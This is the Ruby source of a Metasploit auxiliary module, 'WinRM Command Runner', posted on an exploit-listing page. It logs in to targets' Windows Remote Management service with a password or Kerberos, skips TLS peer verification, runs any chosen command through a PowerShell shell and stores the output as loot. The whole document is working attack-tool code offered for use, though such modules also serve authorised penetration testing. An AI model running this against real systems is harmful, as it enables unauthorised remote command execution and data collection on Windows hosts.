Share
## https://sploitus.com/exploit?id=PACKETSTORM:180977
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'net/winrm/connection'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::WinRM
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'WinRM Command Runner',
'Description' => %q{
This module runs arbitrary Windows commands using the WinRM Service
},
'Author' => [ 'thelightcosine' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('CMD', [ true, 'The windows command to run', 'ipconfig /all' ]),
OptString.new('USERNAME', [ true, 'The username to authenticate as'])
]
)
end
def run
check_winrm_parameters
super
end
def run_host(ip)
rhost = datastore['RHOST']
rport = datastore['RPORT']
uri = datastore['URI']
ssl = datastore['SSL']
schema = ssl ? 'https' : 'http'
endpoint = "#{schema}://#{rhost}:#{rport}#{uri}"
opts = {
endpoint: endpoint,
host: rhost,
port: rport,
proxies: datastore['Proxies'],
uri: uri,
ssl: ssl,
transport: :rexhttp,
no_ssl_peer_verification: true,
operation_timeout: 1,
timeout: 20,
retry_limit: 1,
realm: datastore['DOMAIN']
}
case datastore['Winrm::Auth']
when Msf::Exploit::Remote::AuthOption::KERBEROS
kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::HTTP.new(
host: datastore['DomainControllerRhost'],
hostname: datastore['Winrm::Rhostname'],
proxies: datastore['proxies'],
realm: datastore['DOMAIN'],
username: datastore['USERNAME'],
password: datastore['PASSWORD'],
timeout: 20, # datastore['timeout']
framework: framework,
framework_module: self,
cache_file: datastore['Winrm::Krb5Ccname'].blank? ? nil : datastore['Winrm::Krb5Ccname'],
mutual_auth: true,
use_gss_checksum: true,
ticket_storage: kerberos_ticket_storage,
offered_etypes: Msf::Exploit::Remote::AuthOption.as_default_offered_etypes(datastore['Winrm::KrbOfferedEncryptionTypes'])
)
opts = opts.merge({
user: '', # Need to provide it, otherwise the WinRM module complains
password: '', # Need to provide it, otherwise the WinRM module complains
kerberos_authenticator: kerberos_authenticator,
vhost: datastore['RHOSTNAME']
})
else
opts = opts.merge({
user: datastore['USERNAME'],
password: datastore['PASSWORD'],
})
end
conn = Net::MsfWinRM::RexWinRMConnection.new(opts)
begin
shell = conn.shell(:powershell)
lines = []
shell.run(datastore['CMD']) do |stdout, stderr|
stdout&.each_line do |line|
print_line(line.rstrip)
lines << line
end
print_error(stderr) if stderr
end
data = lines.join
path = store_loot('winrm.cmd_results', 'text/plain', ip, data, 'winrm_cmd_results.txt', 'WinRM CMD Results')
print_good "Results saved to #{path}"
ensure
shell.close if shell
end
end
end